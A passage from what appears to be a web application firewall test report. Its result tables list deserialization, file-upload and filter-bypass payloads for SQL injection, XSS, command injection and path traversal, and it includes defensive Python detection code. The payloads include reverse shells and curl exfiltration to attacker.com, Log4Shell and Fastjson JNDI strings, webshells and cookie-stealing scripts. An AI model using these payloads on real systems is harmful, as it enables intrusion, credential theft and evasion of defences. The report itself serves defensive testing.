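    findings = []
    try:
        doc = json.loads(body)
    except ValueError:
        doc = None
    if isinstance(doc, list):
        if len(doc) > limits["batch"]:
            findings.append(f"batch:{len(doc)}")
        queries = [str(op.get("query", "")) for op in doc if isinstance(op, dict)]
    elif isinstance(doc, dict):
        queries = [str(doc.get("query", ""))]
    else:
        queries = [body]
    for q in queries:
        if INTROSPECTION.search(strip_strings(q)):
            findings.append("introspection")
        depth = max_depth(q)
        if depth > limits["depth"]:
            findings.append(f"depth:{depth}")
        worst = max(alias_counts(q).values(), default=0)
        if worst > limits["aliases"]:
            findings.append(f"aliases:{worst}")
        if NOSQL_OPERATOR.search(q):
            findings.append("nosql_operator")
    return findings


if __name__ == "__main__":
    for q in TABLE_QUERIES + [BATCH_BODY]:
        print(analyze(q) or ["no finding"], q[:70])
```

Blocking introspection at the edge is only a stop-gap: the `__schema{types{name}}} {user(id:1){name,NOTEXIST}}` row relies on the server's "did you mean" field suggestions, which survive any WAF rule and have to be disabled in the GraphQL server itself.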

4.19 java php dotnet deserialization

  • Test cases: 7 | Passed: 7 | Pass rate: 100.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | Deserialization - PHP phar deserialization RCE (uploaded file + phar:// LFI) | `O:10:"PHPObject":1:{s:6:"inject";s:10:"phpinfo();";}` | 403 |
| 🛡️ | POST | Deserialization - PHP unserialize object injection RCE | `O:8:"Example2":1:{s:4:"hook";s:43:"system('curl attacker.com/$(whoami\|base64)');";}` | 403 |
| 🛡️ | POST | Deserialization - Python pickle reverse shell | `cos\nsystem\n(S'bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"'\ntR.` | 403 |
| 🛡️ | POST | Deserialization - Ruby YAML command execution | `--- !ruby/object:Gem::Requirement\nrequirements:\n!ruby/object:Gem::DependencyList\nspecs:\n- !ruby/object:Gem::Source::Git\nname: evil\ngit: "curl attacke...` | 403 |
| 🛡️ | POST | Deserialization - Node.js node-serialize RCE | `{"rce":"_$$ND_FUNC$$_function(){require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/attacker.com/4444 0>&1\"')}()"}` | 403 |
| 🛡️ | POST | Deserialization - Java Spring Boot RCE (Jackson gadget) | `["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://attacker.com/evil.sq...` | 403 |
| 🛡️ | POST | Deserialization - PHP SoapClient SSRF via deserialization | `O:10:"SoapClient":2:{s:3:"uri";s:28:"http://169.254.169.254/latest/";s:8:"location";s:39:"http://169.254.169.254/latest/meta-data/";}` | 403 |

4.20 java deserialization

  • Test cases: 11 | Passed: 11 | Pass rate: 100.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | Java - Fastjson JNDI injection RCE | `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com:1389/Exploit","autoCommit":true}` | 403 |
| 🛡️ | POST | Java - Jackson polymorphic typing RCE (ClassPathXmlApplicationContext loading a remote Spring XML) | `["org.springframework.context.support.ClassPathXmlApplicationContext","http://attacker.com/evil.xml"]` | 403 |
| 🛡️ | POST | Java - Log4j JNDI injection RCE (Log4Shell) | `${jndi:ldap://attacker.com:1389/Evil}` | 403 |
| 🛡️ | POST | Java - Spring Cloud Function SpEL RCE | `spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'")` | 403 |
| 🛡️ | POST | Fastjson WAF bypass - Unicode-escaped @type key | `{"\u0040\u0074\u0079\u0070\u0065":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com:1389/Exploit","autoCommit":true}` | 403 |
| 🛡️ | POST | Java - XStream XML deserialization RCE | `<sorted-set><dynamic-proxy><interface>java.lang.Comparable</interface><handler class="java.beans.EventHandler"><target class="java.lang.ProcessBuilder...` | 403 |
| 🛡️ | POST | Fastjson WAF bypass - java.lang.Class cache trick (1.2.47) | `{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker....` | 403 |
| 🛡️ | POST | Fastjson WAF bypass - expectClass whitelist bypass of autoType (AutoCloseable) | `{"@type":"java.lang.AutoCloseable","@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com:1389/Exploit","autoCommit":true}` | 403 |
| 🛡️ | POST | Log4Shell WAF bypass - lower lookup to obfuscate the jndi keyword | `${${lower:j}${lower:n}${lower:d}i:ldap://attacker.com:1389/Evil}` | 403 |
| 🛡️ | POST | Log4Shell WAF bypass - :- empty-default concatenation to obfuscate jndi | `${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.com:1389/Evil}` | 403 |
| 🛡️ | POST | Log4Shell WAF bypass - env lookup default values to obfuscate jndi | `${${env:NaN:-j}ndi${env:NaN:-:}ldap://attacker.com:1389/Evil}` | 403 |

4.21 php deserialization

  • Test cases: 6 | Passed: 6 | Pass rate: 100.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | PHP - unserialize RCE (Guzzle FileCookieJar) | `O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{s:36:"\0GuzzleHttp\Cookie\CookieJar\0cookies";a:0:{}s:39:"\0GuzzleHttp\Cookie\FileCookieJar\0filename";s:25:...` | 403 |
| 🛡️ | POST | PHP - phar deserialization RCE (Monolog) | `phar://uploads/shell.jpg.phar` | 403 |
| 🛡️ | POST | PHP - Symfony Process RCE | `O:29:"Symfony\Component\Process\Process":7:{s:11:"commandline";s:41:"bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'";s:7:"cwd" ;N;s:3:"env";...` | 403 |
| 🛡️ | POST | PHP - SoapClient SSRF + CRLF (via deserialization) | `O:10:"SoapClient":3:{s:3:"uri";s:28:"http://169.254.169.254/latest/";s:8:"location";s:39:"http://169.254.169.254/latest/meta-data/";s:13:"_soap_versio...` | 403 |
| 🛡️ | POST | PHP - PHPGGC Laravel RCE | `O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"\0*\0events";O:25:"Illuminate\Bus\Dispatcher":1:{s:16:"\0*\0queueResolver";a:2:{i:0;O:25:"Mock...` | 403 |
| 🛡️ | POST | PHP - WordPress PHPMailer RCE (CVE-2016-10033) | `O:9:"PHPMailer":1:{s:6:"Sender";s:52:"attacker -oQ/tmp/ -X/var/www/html/shell.php root";}` | 403 |

4.22 python deserialization

  • Test cases: 7 | Passed: 7 | Pass rate: 100.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | Python - pickle RCE (reverse shell) | `cos\nsystem\n(S'bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"'\ntR.` | 403 |
| 🛡️ | POST | Python - pickle running a base64-encoded command through os.system | `cos\nsystem\n(S'echo YmFzaCAtaSA+JiAvZGV2L3RjcC9hdHRhY2tlci5jb20vNDQ0NCAwPiYx \|base64 -d\|bash'\ntR.` | 403 |
| 🛡️ | POST | Python - yaml.unsafe_load RCE | `!!python/object/apply:os.system ["cat /etc/shadow\|base64\|curl attacker.com -d @-"]` | 403 |
| 🛡️ | POST | Python - PyYAML deserialize_all RCE | `python: !!python/object/apply:subprocess.check_output [["id"]]` | 403 |
| 🛡️ | POST | Python - ruamel.yaml RCE | `!!python/object/new:subprocess.check_output [["cat /etc/passwd"]]` | 403 |
| 🛡️ | POST | Python - NumPy pickle deserialization RCE | `cos\nsystem\n(S'curl attacker.com/$(cat /etc/passwd\|base64)'\ntR.` | 403 |
| 🛡️ | POST | Python - pandas read_pickle RCE | `cos\nsystem\n(S'wget http://attacker.com/shell.py -O /tmp/shell.py; python3 /tmp/shell.py'\ntR.` | 403 |

4.23 dotnet deserialization

  • Test cases: 4 | Passed: 4 | Pass rate: 100.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | .NET - DataContractSerializer RCE (XAML payload) | `<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:Sys...` | 403 |
| 🛡️ | POST | .NET - SoapFormatter RCE | `<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Body><a1:Process id="ref-1" xmlns:a1="http://schemas.microsoft.com/...` | 403 |
| 🛡️ | POST | .NET - NetDataContractSerializer RCE | `<NetDataContractSerializer><Process xmlns="http://schemas.datacontract.org/2004/07/System.Diagnostics" xmlns:i="http://www.w3.org/2001/XMLSchema-insta...` | 403 |
| 🛡️ | POST | .NET - JavaScriptSerializer type confusion RCE | `{"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","StartInfo":{"FileName":"cmd.exe","A...` | 403 |

4.24 nodejs deserialization

  • Test cases: 6 | Passed: 6 | Pass rate: 100.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | Node.js - node-serialize + fs file read | `{"rce":"_$$ND_FUNC$$_function(){return require('fs').readFileSync('/etc/passwd','utf8')}()"}` | 403 |
| 🛡️ | POST | Node.js - node-serialize RCE (IIFE) | `{"rce":"_$$ND_FUNC$$_function(){require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/attacker.com/4444 0>&1\"')}()"}` | 403 |
| 🛡️ | POST | Node.js - funcster RCE | `{"__js_function":"function(){return require('child_process').execSync('curl attacker.com/$(whoami\|base64)')}"}` | 403 |
| 🛡️ | POST | Node.js - serialize-javascript RCE | `function(){return require('child_process').execSync('cat /etc/shadow').toString();}()` | 403 |
| 🛡️ | POST | Node.js - Cryo RCE | `{"root":"_CRYO_FUNC_function(){require('child_process').execSync('id')}"}` | 403 |
| 🛡️ | POST | Node.js - serialize-to-js XSS to RCE | `{"key":"function(){return require('child_process').execSync('wget http://attacker.com/shell.sh -O /tmp/.x; bash /tmp/.x')}()"}` | 403 |

4.25 ruby deserialization

  • Test cases: 3 | Passed: 3 | Pass rate: 100.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | Ruby - Psych YAML RCE | `--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n? !ruby/object:OpenStruct\ntable:\n:defaults:\n:action: "system('cat /etc/shadow...` | 403 |
| 🛡️ | POST | Ruby - ERB template injection RCE | `<%= system('cat /etc/passwd') %>` | 403 |
| 🛡️ | POST | Ruby - ERB.new object injection RCE | `<%= eval("File.read('/etc/shadow')") %>` | 403 |

4.26 file upload

  • Test cases: 16 | Passed: 16 | Pass rate: 100.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | File upload - PHP double extension (shell.php.jpg) + webshell | `shell.php.jpg <?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | File upload - trailing space/dot after the PHP extension (shell.php.) + webshell | `shell.php. <?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | File upload - .phtml extension + webshell | `shell.phtml <?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | File upload - ASPX webshell executing system commands | `shell.aspx <%@ Page Language="C#"%><%System.Diagnostics.Process.Start("cmd.exe","/c whoami");%>` | 403 |
| 🛡️ | POST | File upload - JSP webshell calling back to the attacker | `shell.jsp <% Runtime.getRuntime().exec("curl http://attacker.com/$(whoami)"); %>` | 403 |
| 🛡️ | POST | File upload - SVG with XSS stealing cookies | `<svg xmlns="http://www.w3.org/2000/svg" onload="new Image().src='http://attacker.com/c?'+document.cookie"/>` | 403 |
| 🛡️ | POST | File upload - image polyglot with a GIF89a header to pass getimagesize() + webshell | `GIF89a<?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | File upload - null-byte truncation shell.php%00.jpg + webshell | `shell.php%00.jpg <?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | File upload - forged Content-Type image/jpeg + webshell | `Content-Type: image/jpeg <?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | File upload - IIS 6.0 semicolon parsing (shell.asp;.jpg) + webshell | `shell.asp;.jpg <% Execute(Request("cmd")) %>` | 403 |
| 🛡️ | POST | File upload - .pht extension (PHP 7/8) + webshell | `shell.pht <?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | File upload - ASP webshell with a .cer extension | `shell.cer <% Execute(Request("cmd")) %>` | 403 |
| 🛡️ | POST | File upload - Python pickle file deserialization RCE | `model.pkl cos\nsystem\n(S'curl http://attacker.com/$(whoami)'\ntR.` | 403 |
| 🛡️ | POST | File upload - ZIP symlink attack reading /etc/passwd | `symlink.zip [ZIP containing symlink: ../../etc/passwd]` | 403 |
| 🛡️ | POST | File upload - Nginx request-body temp file + LFI getshell chain | `/tmp/nginx/body/0000000001 <?php system($_GET[1]);?>` | 403 |
| 🛡️ | POST | File upload - Elasticsearch dynamic script RCE | `script.json {"script":{"lang":"painless","source":"java.lang.Runtime.getRuntime().exec('curl http://attacker.com/$(whoami)')"}}` | 403 |

4.27 waf bypass sqli

  • Test cases: 20 | Passed: 20 | Pass rate: 100.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | SQLi WAF bypass - whitespace substitution (%09 tab) | `'%09UNION%09SELECT%091,user(),database(),4,5%09FROM%09mysql.user--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - whitespace substitution (%0A line feed) | `'%0AUNION%0ASELECT%0A1,user(),version(),4,5%0AFROM%0Amysql.user--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - whitespace substitution (%0D carriage return) | `'%0DUNION%0DSELECT%0D1,version(),3,4,5--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - whitespace substitution (%0C form feed) | `'%0CUNION%0CSELECT%0C1,user(),database(),4,5--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - whitespace substitution (%A0 non-breaking space) | `'%A0UNION%A0SELECT%A01,user(),database(),4,5--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - block comment in place of whitespace | `1/**/AND/**/1=1--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - inline (version) comments hiding keywords | `1/*!UNION*//*!SELECT*/1,user(),3--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - parentheses in place of whitespace | `1=(SELECT(1)FROM(users)WHERE(1=1))--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - backticks around keywords | `1%60UNION%60SELECT%601,2,3--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - scientific-notation token (.e(0)) in place of whitespace | `'.e(0)UNION.e(0)SELECT.e(0)1,user(),version(),4,5.e(0)FROM.e(0)dual--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - hex-encoded string literals | `1 UNION SELECT 0x61646d696e,0x70617373776f7264,3--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - REGEXP in place of equals | `1 AND 'a' REGEXP '^a'--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - LIKE in place of equals | `1 AND 'a' LIKE 'a'--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - BETWEEN in place of equals | `1 AND 1 BETWEEN 1 AND 1--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - alternative operator in place of OR | | |
| 🛡️ | POST | SQLi WAF bypass - && in place of AND | `'%26%26(SELECT 1 FROM mysql.user WHERE user='root')>0--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - doubled keywords to defeat keyword stripping | `1 UNIUNIONSELECTON SELECT 1,user(),3--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - mixed case to defeat keyword filters | `1 UnIoN SeLeCt 1,version(),3--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - percent-sign bypass | `1 UNION SELECT 1,2,3 FROM dual WHERE 1=1 AND 2344=2344 AND '1q'='1q` | 403 |
| 🛡️ | POST | SQLi WAF bypass - ORDER BY blind inference in place of UNION | `1 ORDER BY (SELECT 1 FROM information_schema.columns WHERE table_name=0x7573657273)--` | 403 |

4.28 waf bypass sqli db

  • Test cases: 16 | Passed: 16 | Pass rate: 100.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | SQLi WAF bypass - comments in place of whitespace (labelled MSSQL; the payload shown is MySQL syntax) | `'/**/UNION/**/SELECT/**/1,user(),version(),4,5/**/FROM/**/mysql.user--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - MSSQL UTF-16 hex literal to evade string detection | `1 UNION SELECT 0x730065006C00650063007400 FROM master..sysdatabases--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - MSSQL parentheses in place of whitespace | `1=(SELECT(1)FROM(master..sysdatabases)WHERE(name LIKE'%'))` | 403 |
| 🛡️ | POST | SQLi WAF bypass - MySQL backticks around keywords | `1%60UNION%60SELECT%601,user(),3%60FROM%60mysql.user%60--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - PostgreSQL type casts to evade UNION detection | `1 UNION SELECT NULL::text,current_database()::text,3--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - PostgreSQL $$ dollar quoting to evade quote detection | `1 UNION SELECT $$tablename$$,2,3 FROM information_schema.tables--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - MySQL /*!50000*/ version comments | `'/*!50000UNION*//*!50000SELECT*/1,user(),version(),4,5/*!50000FROM*//*!50000mysql.user*/--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - MySQL floating-point scientific notation | `1.e(UNION)e(SELECT)e(1,2,3)e(FROM)e(dual)--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - Oracle ROWNUM to limit rows | `' UNION SELECT username,password FROM all_users WHERE ROWNUM=1--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - MySQL equivalent function (MID for SUBSTRING) | `' AND IF(MID((SELECT password FROM users LIMIT 1),1,1)='a',SLEEP(5),0)--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - MySQL BENCHMARK in place of SLEEP to evade delay detection | `' AND IF(1=1,BENCHMARK(50000000,MD5('x')),1)--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - PostgreSQL CHR() in place of quotes | `1 UNION SELECT CHR(116)\|\|CHR(97)\|\|CHR(98)\|\|CHR(108)\|\|CHR(101),2,3--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - MySQL double URL encoding | `%25%32%37%25%32%30%25%35%35%25%34%65%25%34%39%25%34%66%25%34%65%25%32%30%25%35%33%25%34%35%25%34%63%25%34%35%25%34%33%25%35%34%25%32%30%25%33%31` | 403 |
| 🛡️ | POST | SQLi WAF bypass - Oracle NVL() to evade null checks | `' UNION SELECT NVL(username,'NULL'),NVL(password,'NULL') FROM all_users--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - newline in place of whitespace (all databases) | `1%0aUNION%0aSELECT%0a1,2,3%0aFROM%0adual--` | 403 |
| 🛡️ | POST | SQLi WAF bypass - %09 tabs mixed with comments | `1%09UNION%09SELECT%09%09--%09%0a1,2,3%09--%09%0aFROM%09users--` | 403 |

4.29 waf bypass xss

  • Test cases: 19 | Passed: 19 | Pass rate: 100.0%

| Status | Method | Test case |Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | XSS WAF bypass - whitespace substitution (0x0C form feed) | `<svg%0Conload=fetch('http://attacker.com/'+document.cookie)>` | 403 |
| 🛡️ | POST | XSS WAF bypass - mixed-case tags to evade tag filters | `<ScRiPt>fetch('http://attacker.com/'+document.cookie)</sCrIpT>` | 403 |
| 🛡️ | POST | XSS WAF bypass - slash in place of whitespace | `<img/src=x/onerror=fetch('http://attacker.com/'+document.cookie)>` | 403 |
| 🛡️ | POST | XSS WAF bypass - HTML entity encoding (decimal) | `<svg onload=&#102&#101&#116&#099&#104&#040&#039&#104&#116&#116&#112&#058&#047&#047&#097&#116&#116&#097&#099&#107&#101&#114&#046&#099&#111&#109&#047&#0...` | 403 |
| 🛡️ | POST | XSS WAF bypass - null byte inside the on* attribute name | `<img src=x onerror\x00=fetch('http://attacker.com/'+document.cookie)>` | 403 |
| 🛡️ | POST | XSS WAF bypass - tagged template (backticks) to avoid parentheses | `` <script>fetch`http://attacker.com/${document.cookie}`</script> `` | 403 |
| 🛡️ | POST | XSS WAF bypass - string concatenation to defeat keyword blacklists | `<script>eval('fetc'+'h("http://attacker.com/"+docu'+'ment.cookie)')</script>` | 403 |
| 🛡️ | POST | XSS WAF bypass - bracket access on window to defeat property blacklists | `<script>window['fetch']('http://attacker.com/'+document['cookie'])</script>` | 403 |
| 🛡️ | POST | XSS WAF bypass - atob base64 to hide keywords | `<script>eval(atob('ZmV0Y2goJ2h0dHA6Ly9hdHRhY2tlci5jb20vJytkb2N1bWVudC5jb29raWUp'))</script>` | 403 |
| 🛡️ | POST | XSS WAF bypass - throw with onerror to avoid parentheses | `<script>{onerror=fetch}throw'http://attacker.com/'+document.cookie</script>` | 403 |
| 🛡️ | POST | XSS WAF bypass - template string to avoid quotes | `` <svg/onload=fetch(`http://attacker.com/${document.cookie}`)> `` | 403 |
| 🛡️ | POST | XSS WAF bypass - Unicode escapes for < and > | `\u003cscript\u003efetch('http://attacker.com/'+document.cookie)\u003c/script\u003e` | 403 |
| 🛡️ | POST | XSS WAF bypass - JSFuck encoding (only +!()[] characters) | `<script>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[]</script>` | 403 |
| 🛡️ | POST | XSS WAF bypass - data:text/html base64 in an object element | `<object data="data:text/html;base64,PHNjcmlwdD5mZXRjaCgnaHR0cDovL2F0dGFja2VyLmNvbS8nK2RvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=">` | 403 |
| 🛡️ | POST | XSS WAF bypass - bogus attribute before the real onload | `<svg/onrandom=random onload=fetch('http://attacker.com/'+document.cookie)>` | 403 |
| 🛡️ | POST | XSS WAF bypass - SVG animate onbegin event | `<svg><animate onbegin=fetch('http://attacker.com/'+document.cookie) attributeName=x dur=1s>` | 403 |
| 🛡️ | POST | XSS WAF bypass - details element ontoggle event | `<details open ontoggle=fetch('http://attacker.com/'+document.cookie)>` | 403 |
| 🛡️ | POST | XSS WAF bypass - marquee element onstart event | `<marquee onstart=fetch('http://attacker.com/'+document.cookie)>` | 403 |
| 🛡️ | POST | XSS WAF bypass - semicolon-separated statements, no whitespace | `<script>fetch('http://attacker.com/'+document.cookie)</script><script>void(0)</script>` | 403 |

4.30 waf bypass command

  • Test cases: 18 | Passed: 18 | Pass rate: 100.0%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | CMD WAF bypass - ${IFS} in place of whitespace | `;cat${IFS}/etc/shadow` | 403 |
| 🛡️ | POST | CMD WAF bypass - brace expansion in place of whitespace | `;{cat,/etc/shadow}` | 403 |
| 🛡️ | POST | CMD WAF bypass - %09 tab in place of whitespace | `;cat%09/etc/shadow` | 403 |
| 🛡️ | POST | CMD WAF bypass - $() command substitution | `;$(cat /etc/shadow\|base64\|curl attacker.com -d @-)` | 403 |
| 🛡️ | POST | CMD WAF bypass - backtick command substitution | ``` ;cat /etc/shadow\|base64\|curl attacker.com -d @-`` ``` | 403 |
| 🛡️ | POST | CMD WAF bypass - hex escapes with echo -e to hide keywords | `;echo -e '\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77'\|bash` | 403 |
| 🛡️ | POST | CMD WAF bypass - xxd hex decoding | `;xxd -r -p<<<636174202f6574632f736861646f777c62617365\|bash` | 403 |
| 🛡️ | POST | CMD WAF bypass - octal escapes to hide keywords | `;eval $'\143\141\164\040\057\145\164\143\057\163\150\141\144\157\167'` | 403 |
| 🛡️ | POST | CMD WAF bypass - glob wildcards in place of command names | `;/??n?/?at /???/????d?w` | 403 |
| 🛡️ | POST | CMD WAF bypass - printf hex decoding | `;$(printf '\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77')\|bash` | 403 |
| 🛡️ | POST | CMD WAF bypass - mixed case to evade command-name detection | `;CaT /eTc/ShAdOw\|base64\|curl attacker.com -d @-` | 403 |
| 🛡️ | POST | CMD WAF bypass - single quotes splitting the command name | `;c'a't /e't'c/s'h'adow\|base64\|curl attacker.com -d @-` | 403 |
| 🛡️ | POST | CMD WAF bypass - double quotes splitting the command name | `;c"a"t /e"t"c/s"h"adow\|base64\|curl attacker.com -d @-` | 403 |
| 🛡️ | POST | CMD WAF bypass - empty $@ expansion inside the command name | `;c$@at /etc/shadow` | 403 |
| 🛡️ | POST | CMD WAF bypass - input redirection in place of whitespace | `;cat</etc/shadow` | 403 |
| 🛡️ | POST | CMD WAF bypass - variable slice building the / character (${HOME:0:1}) | `;cat ${HOME:0:1}etc${HOME:0:1}shadow` | 403 |
| 🛡️ | POST | CMD WAF bypass - tr building the / character | `;cat $(echo .\|tr '!-0' '"-1')etc$(echo .\|tr '!-0' '"-1')shadow` | 403 |
| 🛡️ | POST | CMD WAF bypass - whole command base64-encoded | `;echo Y3VybCBhdHRhY2tlci5jb20vJChjYXQgL2V0Yy9zaGFkb3d8YmFzZTY0KQ== \|base64 -d\|bash` | 403 |

4.31 waf bypass path

  • Test cases: 11 | Passed: 10 | Pass rate: 90.9%

| Status | Method | Test case | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | GET | Path bypass - doubled ../ (....//) to read /etc/passwd and list system users | `....//....//....//etc/passwd` | 403 |
| 🛡️ | GET | Path bypass - URL-encoded ../ to read /etc/shadow password hashes | `%2e%2e/%2e%2e/%2e%2e/etc/shadow` | 403 |
| ⚠️ | GET | Path bypass - double URL encoding to read root's SSH private key for lateral movement | `%252e%252e%252f%252e%252e%252f%252e%252e%252froot%252f.ssh%252fid_rsa` | 200 |
| 🛡️ | GET | Path bypass - ..;/ semicolon segments to read the Nginx config and leak backend addresses | `..;/..;/..;/etc/nginx/sites-enabled/default` | 403 |
| 🛡️ | GET | Path bypass - backslashes to read the Windows SAM database | `..\..\..\windows\system32\config\SAM` | 403 |
| 🛡️ | GET | Path bypass - absolute /../ prefix to read /etc/shadow | `/../../../../etc/shadow` | 403 |
| 🛡️ | GET | Path bypass - null byte truncating an appended .html suffix | `../../../etc/passwd%00.html` | 403 |
| 🛡️ | GET | Path bypass - ./ padding to defeat depth limits, reading the MySQL config | `../../../etc/mysql/my.cnf/./././././.` | 403 |
| 🛡️ | GET | Path bypass - %23 fragment truncation to read the SSH private key | `../../../root/.ssh/id_rsa%23` | 403 |
| 🛡️ | GET | Path bypass - %3F query truncation to read the database config | `../../../var/www/html/config/database.php%3F` | 403 |
| 🛡️ | GET | Path bypass - double-encoded null byte truncation to read passwd | `../../../etc/passwd%2500.html` | 403 |
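
The one miss in this table is the double URL-encoded path. A filter that percent-decodes once sees `%2e%2e%2f` and never a `../`, while a backend (or a proxy in front of it) that decodes a second time does. The Python canonicaliser below is an added example for this report, not JXWAF's normalisation code: it decodes until the value stops changing (bounded at three rounds), maps backslashes to slashes, truncates at the first NUL and drops `;` path parameters before looking for a parent-directory step. The payloads are copied from the table; `decode_once_flags` models the single-pass behaviour, and the decode bound is a choice made here. Whether to decode repeatedly in production depends on the backend actually doing so, since over-decoding rejects legitimate paths that contain literal percent signs.

```python
"""Path canonicalisation before traversal matching.

Added example for this report, not JXWAF's normalisation code. The payloads are
copied from the waf bypass path table; the decode bound and the handling of ';'
path parameters are choices made for this example.
"""
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3                 # covers %2525-style triple encoding; bounded on purpose
PATH_PARAM = re.compile(r";[^/]*")    # Tomcat/Java style "..;/" segments

# Copied from the table above; only the third row was missed by the WAF.
TABLE_PAYLOADS = [
    "....//....//....//etc/passwd",
    "%2e%2e/%2e%2e/%2e%2e/etc/shadow",
    "%252e%252e%252f%252e%252e%252f%252e%252e%252froot%252f.ssh%252fid_rsa",
    "..;/..;/..;/etc/nginx/sites-enabled/default",
    r"..\..\..\windows\system32\config\SAM",
    "/../../../../etc/shadow",
    "../../../etc/passwd%00.html",
    "../../../etc/mysql/my.cnf/./././././.",
    "../../../root/.ssh/id_rsa%23",
    "../../../var/www/html/config/database.php%3F",
    "../../../etc/passwd%2500.html",
]


def percent_decode_fully(value: str, rounds: int = MAX_DECODE_ROUNDS) -> str:
    """Percent-decode until the value stops changing, at most `rounds` times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def canonicalize(raw: str) -> str:
    """Reduce a path to the form the file system would see: fully decoded,
    forward slashes only, cut at the first NUL, ';' parameters dropped."""
    value = percent_decode_fully(raw)
    value = value.replace("\\", "/")
    value = value.split("\x00", 1)[0]
    return PATH_PARAM.sub("", value)


def is_traversal(raw: str) -> bool:
    """True when the canonical path still contains a parent-directory step.
    '....//' is caught because it contains '../' literally; no slash collapsing
    is done first, since a naive filter that strips '../' once is exactly what
    that payload targets."""
    canon = canonicalize(raw)
    return "../" in canon or canon.endswith("/..") or canon == ".."


def decode_once_flags(raw: str) -> bool:
    """Single-pass decoding, the behaviour of a filter that misses double encoding."""
    return "../" in unquote(raw)


if __name__ == "__main__":
    for p in TABLE_PAYLOADS:
        print(f"once={decode_once_flags(p)!s:5} full={is_traversal(p)!s:5} {canonicalize(p)}")
```

Run against the table, only the third payload separates the two checks: `decode_once_flags` returns False for it while `is_traversal` returns True, which is the same split the report shows between this WAF's result and the attack's effect on a double-decoding backend.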

4.32 waf bypass lfi

